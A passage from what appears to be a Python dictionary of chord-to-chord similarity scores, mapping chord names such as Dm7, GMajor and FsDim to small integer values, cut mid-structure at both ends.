'DsMaj7': 2,
'BMaj7': 3,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 2,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 2,
'Ds7': 3,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 3,
},
'Gsm7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 3,
'GMaj7': 2,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 4,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 0,
'GsMinor': 3,
'Bm7': 2,
'G7': 1,
'Asm7': 1,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 3,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 2,
},
'DMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 4,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 3,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 3,
'AsDim': 1,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 2,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 3,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'Dm7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 1,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 4,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 3,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 2,
'F7': 3,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 3,
'D7': 3,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'Cm7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 4,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 2,
'DsMajor': 3,
'E7': 0,
'C7': 3,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 3,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 2,
},
'CsMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FsMinor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 3,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 0,
'E7': 0,
'C7': 0,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 2,
'AsDim': 1,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 0,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'DsMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 4,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 3,
'E7': 1,
'C7': 2,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 3,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'BMaj7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 1,
'Dsm7': 3,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 4,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 2,
'G7': 1,
'Asm7': 1,
'BMajor': 3,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 2,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 3,
},
'GMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'EMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 2,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 3,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 2,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 2,
'As7': 0,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 3,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'CsMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 4,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 3,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 2,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 3,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 2,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 2,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'DMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 3,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 3,
'FMajor': 2,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'FMajor': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 1,
'F7': 3,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'ADim': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 3,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 3,
'FMaj7': 2,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'CMinor': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 2,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 2,
'DsMajor': 2,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 1,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'EDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 3,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 2,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'B7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 4,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 0,
'GsMinor': 2,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 3,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'AMajor': {
'AMinor': 2,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 3,
'A7': 3,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'A7': {
'AMinor': 2,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 3,
'A7': 4,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 1,
